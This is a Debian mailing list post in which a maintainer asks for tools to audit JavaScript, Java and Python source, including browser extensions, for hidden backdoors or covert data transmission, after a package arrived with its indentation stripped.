[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

source code "forensic" practices

Dear Debian People,

I ITPed a package which unfortunately ended up not providing original
sources (sources everybody gets were indentation removed). Unreasonable
denial of providing original source forced me to question good intent of
the author to provide useful and spam/crap-free software. Since I could
not possibly to examine that code, I've decided to look at other
software written by the same author, and which has original source code,
which probably nobody else ever examined anyways.

The question is: are there any helper tools for doing source code
validation subject to possibly available snippets of code which might be
for illegal activity (ie sending out private information, or serve as
backdoors, etc)? May be some language specific tools (JS, Java, python)
which could catch snippets intended for data transmission/receival? 

Sniffing of the traffic of running app is an effective utility but
can't always apply (I could write a code which sends out information
only once in a month on a random date/time, I doubt that anyone would
monitor/analyze all the monthly traffic to catch me), especially if a
particular application is an extension to the bigger application (like
mozilla products' extensions).

Especially it becomes a hard task in checking extensions to Internet
appliances such as web-browsers, which can provide reach API for the
purpose of data transmission/receipt, and packets from a specific
extension would be buried in the rest of the traffic coming out from
the application.

=------------------------------   /v\  ----------------------------=
Keep in touch                    // \\     (yoh@|www.)onerussian.com
Yaroslav Halchenko              /(   )\               ICQ#: 60653192
                   Linux User    ^^-^^    [175555]

Reply to: